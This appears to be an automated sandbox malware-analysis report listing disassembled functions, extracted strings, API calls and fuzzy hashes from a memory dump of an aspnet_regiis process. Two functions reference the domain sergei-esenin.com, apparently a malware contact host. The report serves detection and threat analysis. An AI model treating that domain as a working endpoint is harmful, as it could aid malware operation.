Function 00593090 Relevance: 5.7, Strings: 4, Instructions: 733COMMON

Download Yara Rule

Strings

r8Y, xrefs: 005937F9
D2Y, xrefs: 005931D0
"4Y, xrefs: 00593412
F3Y, xrefs: 005931D9

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: "4Y$D2Y$F3Y$r8Y
API String ID: 0-2493739190
Opcode ID: 7e7f9715d671c206c3ff99c9d3728093ac0382aac0c4130ed36f8398d7441e7f
Instruction ID: 1eb0dca988aa829403ab788654555e673499bd65d7bd79dcf0fb091d94d3637f
Opcode Fuzzy Hash: 7e7f9715d671c206c3ff99c9d3728093ac0382aac0c4130ed36f8398d7441e7f
Instruction Fuzzy Hash: 4F220136B14215CFCB08CF68D8916AABBF2FB89314F0A817ED896D7351DB349905CB90

Function 00584D70 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 210COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00584DB9
GetSystemMetrics.USER32 ref: 00584DC9

Strings

, xrefs: 00584EB9

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: d849db1d054a78db8b38bb127ea6346b345655b89d5791d84fc7f4c7ce071ee3
Instruction ID: f2d31a9b17bc79e4a4bf6c63a2a049f6dd9033315928d9801a54f0fe7b2cfc3f
Opcode Fuzzy Hash: d849db1d054a78db8b38bb127ea6346b345655b89d5791d84fc7f4c7ce071ee3
Instruction Fuzzy Hash: 73D145B400A3898BDB74DF95D94A78BBFE1BB86708F90891DD1EC9B240C7B45548CF92

Function 00570B10 Relevance: 4.1, Strings: 3, Instructions: 380COMMON

Download Yara Rule

Strings

a/\-, xrefs: 00570BCB
R?G=, xrefs: 00570BEB
87, xrefs: 00570BFB

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: 87$R?G=$a/\-
API String ID: 0-3222100567
Opcode ID: 1eb7ef465d5ec88b56ba8fb6068782e8dbc57ff36d35891d1e37f47ae127ed95
Instruction ID: d681dbbc49e21ce550fb5c80da4caeeef8144f651a8b599755c65c24b46fc221
Opcode Fuzzy Hash: 1eb7ef465d5ec88b56ba8fb6068782e8dbc57ff36d35891d1e37f47ae127ed95
Instruction Fuzzy Hash: 39B1ADB4518301CBC7248F28D89166BBBF1FF91324F18DA1CE8999B3E1E7749905DB92

Function 0057C486 Relevance: 4.0, Strings: 3, Instructions: 294COMMON

Download Yara Rule

Strings

I^, xrefs: 0057C6B9
[M, xrefs: 0057C6B1
lC, xrefs: 0057C6C9

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: I^$[M$lC
API String ID: 0-3459864908
Opcode ID: 2508cbba516e4a38f6ae6c95550d2bccb0b610560b80b0077506a39f4d0ba057
Instruction ID: 67eb7c187ca3bc4a6661ab7962247afc4ccfe8ec553d45296f3eda66e4a610c6
Opcode Fuzzy Hash: 2508cbba516e4a38f6ae6c95550d2bccb0b610560b80b0077506a39f4d0ba057
Instruction Fuzzy Hash: E781DE719083118BD720DF14D85176BBBB1FFE6711F08892CE8D54B3A0E7B9A905DB86

Function 00574030 Relevance: 3.9, Strings: 3, Instructions: 105COMMON

Download Yara Rule

Strings

BAW, xrefs: 00574137
01, xrefs: 00574084
L9D;, xrefs: 00574074

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: 01$BAW$L9D;
API String ID: 0-1755942960
Opcode ID: 39bc2219b862c964e5b8163529f013947e996bf95a3155ab89b0095d2356e361
Instruction ID: 28c535783be788c8dcf7afd0f5af46d430ea3b63b7cc789a5fca51048daa039f
Opcode Fuzzy Hash: 39bc2219b862c964e5b8163529f013947e996bf95a3155ab89b0095d2356e361
Instruction Fuzzy Hash: 582100609083008BD3109F28D85AA37BAF4FF96360F55CA18E4C8CB390E7388D44DB96

Function 0057B525 Relevance: 3.0, Strings: 2, Instructions: 531COMMON

Download Yara Rule

Strings

:&Sh, xrefs: 0057B2C0
_&Sh, xrefs: 0057B308

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: :&Sh$_&Sh
API String ID: 0-3716481201
Opcode ID: 316b85d60cb15696eff67ef46c5cef29d05e773bcb165efdada0b115c0af18c0
Instruction ID: 119c3a4f634d25f31434f60598a759ac0412a69f5b49db89a630ab6c24fe3e04
Opcode Fuzzy Hash: 316b85d60cb15696eff67ef46c5cef29d05e773bcb165efdada0b115c0af18c0
Instruction Fuzzy Hash: 6D02F571908341CFE7248F24E85072ABBE2BF95310F1A896DE499973A2D7709D09DF92

Function 00591E50 Relevance: 2.8, Strings: 2, Instructions: 296COMMON

Download Yara Rule

Strings

MJKH, xrefs: 00591EB1
MJKH, xrefs: 00592024

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID: InitializeThunk
String ID: MJKH$MJKH
API String ID: 2994545307-2671171847
Opcode ID: 326b8f23e5e3f903249f325893501365c6164ea197fabde4711354fec0cb137d
Instruction ID: 69f6bd1231f48d7f092a27d980e2f87e8bba2c9a8ad0a1205771705a94192006
Opcode Fuzzy Hash: 326b8f23e5e3f903249f325893501365c6164ea197fabde4711354fec0cb137d
Instruction Fuzzy Hash: 3C91F931608312ABEB34DB14CC45BBBBBE6FBC5354F14882CE99597281E7309C50DBA6

Function 00580FD0 Relevance: 2.7, Strings: 2, Instructions: 224COMMON

Download Yara Rule

Strings

xl&w, xrefs: 00580D40
xl&w, xrefs: 00580E8F

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: xl&w$xl&w
API String ID: 0-1187292416
Opcode ID: 54064710c2610a44c7a4c9c6a4df63dd008af0f499082e557c765396a12879ae
Instruction ID: 716b8032edaf9101f3af4cb727c3c9a2ac731f26f9f013216dc7ec3da51345eb
Opcode Fuzzy Hash: 54064710c2610a44c7a4c9c6a4df63dd008af0f499082e557c765396a12879ae
Instruction Fuzzy Hash: C751E620245B408BE7758B3584903B3BFE2EBA3314F18996DC8EB9B2D5D639680AC751

Function 0055D340 Relevance: 2.7, Strings: 2, Instructions: 219COMMON

Download Yara Rule

Strings

*3, xrefs: 0055D38C
*, xrefs: 0055D358

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: *$*3
API String ID: 0-20239172
Opcode ID: 9e0d93b3c3b16dc16128a736b581e60677b2ba48636828ab342dd6c1eaca591e
Instruction ID: 504a352395e81ad40be784f61d040de503365dc04f4321c064ccd48421361a9b
Opcode Fuzzy Hash: 9e0d93b3c3b16dc16128a736b581e60677b2ba48636828ab342dd6c1eaca591e
Instruction Fuzzy Hash: 9E51E67150C7818ED715CF29845076BFFE0AFD3305F18999EE4C49B292E735C80A8B62

Function 0057AFE3 Relevance: 2.7, Strings: 2, Instructions: 172COMMON

Download Yara Rule

Strings

:&Sh, xrefs: 0057B2C0
_&Sh, xrefs: 0057B308

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: :&Sh$_&Sh
API String ID: 0-3716481201
Opcode ID: b38b5cf12eb6cb80367fb83bdfadc5fdcc9e1138648c44ecebe1aa81432265f7
Instruction ID: 312ae8aa2ec0ea711bb5178838634dba6c2e4751a4115fe8a2fe05f53cfca207
Opcode Fuzzy Hash: b38b5cf12eb6cb80367fb83bdfadc5fdcc9e1138648c44ecebe1aa81432265f7
Instruction Fuzzy Hash: F96195B1508385DFE7209F24E94071BBBB1BFD5704F15491DE188AB2A2DB70EA09DF92

Function 00575B80 Relevance: 1.8, APIs: 1, Instructions: 291comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00596A60,00000000,00000001,00596A50), ref: 00575BA9

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 629390cddff58776578a832d8f29b0e30bacc856359c4ee3b74b8650c0e45ab8
Instruction ID: f14bfa03c9c31522c5939d082beb56a3bc9303b23fe353ae36d8bd5729c989de
Opcode Fuzzy Hash: 629390cddff58776578a832d8f29b0e30bacc856359c4ee3b74b8650c0e45ab8
Instruction Fuzzy Hash: E871FFB1A007059BDB209F24DC96B677BA8FF85714F08846CF98ACB290F7B5E904D761

Function 005739D0 Relevance: 1.7, Strings: 1, Instructions: 442COMMON

Download Yara Rule

Strings

J, xrefs: 00573AA5

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: J
API String ID: 0-793186624
Opcode ID: 5c79509e3c62b527183e192b998a99b714c06ac65889055f6b849e96cc276e25
Instruction ID: 2c240f5e96ac1da3eff351db0ff6ed98db7ecd0e9cb778c98e6a129a629514a1
Opcode Fuzzy Hash: 5c79509e3c62b527183e192b998a99b714c06ac65889055f6b849e96cc276e25
Instruction Fuzzy Hash: C5C103B15183508BD724CF24D85266BBBF1FF91364F08CA1CE4D58B391E7748905EB92

Function 00593430 Relevance: 1.7, Strings: 1, Instructions: 419COMMON

Download Yara Rule

Strings

r8Y, xrefs: 005937F9

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: r8Y
API String ID: 0-2904305799
Opcode ID: 3cbbaa3404f0bc8d09babca1ba4a6a4f56b8a0ef3122b5aca682423565d491c0
Instruction ID: 00b1de31e78a6319782a52bf08980a8e63770dd49c8122345fca7980f2b34f7f
Opcode Fuzzy Hash: 3cbbaa3404f0bc8d09babca1ba4a6a4f56b8a0ef3122b5aca682423565d491c0
Instruction Fuzzy Hash: C7D11675B09211CFCB04CF28D8916AABBF2FF89314F1A847ED89697351D7349A09CB91

Function 0057E030 Relevance: 1.7, Strings: 1, Instructions: 418COMMON

Download Yara Rule

Strings

", xrefs: 0057E327

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 32639b3e5fe237b22a5bdd9027b1695fabee73192c5b2a517985cef4bc2c86a3
Instruction ID: da02c9b7bc0423606080653c406e570c3e68457208bbad15fb21692677a5fa97
Opcode Fuzzy Hash: 32639b3e5fe237b22a5bdd9027b1695fabee73192c5b2a517985cef4bc2c86a3
Instruction Fuzzy Hash: 82D1E6B1A043115BD724CE24D496A6BBFEABF88314F09C9ADE88D87382D734DD44D791

Function 0057074A Relevance: 1.6, Strings: 1, Instructions: 341COMMON

Download Yara Rule

Strings

TU, xrefs: 00570994

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: TU
API String ID: 0-2215587796
Opcode ID: ce2de3106b9f4b45609a8f62fd8617dab40bc7092fafaab3f202769a10c9ccf9
Instruction ID: 08e79c6c7f39035da6612efaa1717906479b150e0e3ae48cb360c82bff6010a6
Opcode Fuzzy Hash: ce2de3106b9f4b45609a8f62fd8617dab40bc7092fafaab3f202769a10c9ccf9
Instruction Fuzzy Hash: D09132B5908301CBD314DF15E89166BBBE2FFD5314F08D92CE8898B392E3789905DB92

Function 00580E87 Relevance: 1.5, Strings: 1, Instructions: 233COMMON

Download Yara Rule

Strings

xl&w, xrefs: 00580D40

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: xl&w
API String ID: 0-3283944080
Opcode ID: 2bb6710505108abe36a2a96cb370a014b2bcd4d32f282fb4e3820be1f45c579b
Instruction ID: 7dba1710e524534abca8a31db4e54d6c0d41f07467f0fef17de08006b4836e24
Opcode Fuzzy Hash: 2bb6710505108abe36a2a96cb370a014b2bcd4d32f282fb4e3820be1f45c579b
Instruction Fuzzy Hash: 56512B20249B808FE7758B3584903B3BFD2AF93314F1895ADC8E79B2D6D6396849C750

Function 005776D0 Relevance: 1.5, Strings: 1, Instructions: 207COMMON

Download Yara Rule

Strings

3t, xrefs: 00577948

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: 3t
API String ID: 0-3730750879
Opcode ID: 02cfef26a45293c383cc529303d01d987c90780e25ad003eca3c14dca63f9b1b
Instruction ID: 23296ed9fb7b489c09a0d676ecb17965d3ea8d007109bdab7a05c7545654063b
Opcode Fuzzy Hash: 02cfef26a45293c383cc529303d01d987c90780e25ad003eca3c14dca63f9b1b
Instruction Fuzzy Hash: 1471E0B66183419FD314CF29D88126FBFE2ABD5714F148A2DF4D8AB384D774D9098B82

Function 00580D01 Relevance: 1.4, Strings: 1, Instructions: 159COMMON

Download Yara Rule

Strings

xl&w, xrefs: 00580D40

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID: InitializeThunk
String ID: xl&w
API String ID: 2994545307-3283944080
Opcode ID: 66c2e9b6e3c13fb767a6621d866f971106d8df1bde82c8b7a349e5c88af13fa9
Instruction ID: e2513ce7687bbb1fef7e2929010a61606a2aff1fbd304aab6c81b0b302859871
Opcode Fuzzy Hash: 66c2e9b6e3c13fb767a6621d866f971106d8df1bde82c8b7a349e5c88af13fa9
Instruction Fuzzy Hash: C04128302057418FE7759F348881BB3BFA2FB52304F18986CD9D69B2D6D634B80AC710

Function 00594220 Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

@, xrefs: 00594288

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: 1b27178f01014220f74cc9f3af4e7de3dd2828bfe2d36fe0a1f8012d4628d606
Instruction ID: cf79970267df17d5e3edf88bacfa0049c21028eedd77a84b933d8b0e25939f46
Opcode Fuzzy Hash: 1b27178f01014220f74cc9f3af4e7de3dd2828bfe2d36fe0a1f8012d4628d606
Instruction Fuzzy Hash: 1F31EE711083048FD714DF68D8C1B6BBBF5FF85318F14883DEA9887291D37999498BA6

Function 005606AD Relevance: 1.3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

Strings

sergei-esenin.com, xrefs: 00560714

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: sergei-esenin.com
API String ID: 0-2126347791
Opcode ID: 22394c97d7dbc4a009a2161e5489d0e237feca4a11141332cb515d816d935783
Instruction ID: 3ab6d787d67d91350aacbe7579792b744d9cfd5cd43362c2f9297b2dbd76a3f5
Opcode Fuzzy Hash: 22394c97d7dbc4a009a2161e5489d0e237feca4a11141332cb515d816d935783
Instruction Fuzzy Hash: 7F0142716046418BD718DF38D88973BBBF1ABC2701F449A2EE892C36C0DA34D8018B11

Function 0055E919 Relevance: 1.3, Strings: 1, Instructions: 33COMMON

Download Yara Rule

Strings

sergei-esenin.com, xrefs: 0055E91E

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: sergei-esenin.com
API String ID: 0-2126347791
Opcode ID: ad3b8cc3396795db3c07a9150365cae7c2cc5519701e89e00c451c70e8c13ca0
Instruction ID: 39d5e8bea86affbe5dec112085b4433bf71e3573c40972f00fe2339fa9f46362
Opcode Fuzzy Hash: ad3b8cc3396795db3c07a9150365cae7c2cc5519701e89e00c451c70e8c13ca0
Instruction Fuzzy Hash: B4F06D784183458BC708DF04D86263673B4FF96715F092819E99B9B391E7359D08D726

Function 0057A68D Relevance: .5, Instructions: 505COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd6924caeb659ad3074e8f9748d5326b2aa106d1978a44c986cadf1312b6e005
Instruction ID: d200311e8bc421f2fc9bae85b0fb7badfdf4f7921576725d4f1b7daf2698490c
Opcode Fuzzy Hash: cd6924caeb659ad3074e8f9748d5326b2aa106d1978a44c986cadf1312b6e005
Instruction Fuzzy Hash: CBF1FD715083418FD700CF28E89166FBBE5BFDA314F18892DE9D99B252D334D909DBA2

Function 005921C0 Relevance: .4, Instructions: 370COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c1a78cb8ddbe31908a54507157d22bdaa3c50d1d7382cf41a264abbed06cbeb
Instruction ID: e9acb1fec93c2daf5f590c4b2c578807cc67bbad730a9884fcdd8a292a815c58
Opcode Fuzzy Hash: 4c1a78cb8ddbe31908a54507157d22bdaa3c50d1d7382cf41a264abbed06cbeb
Instruction Fuzzy Hash: BAB12972A043215BEB149E28CC8176BBFD6BBC4314F19893DFD9997381EA78EC058791

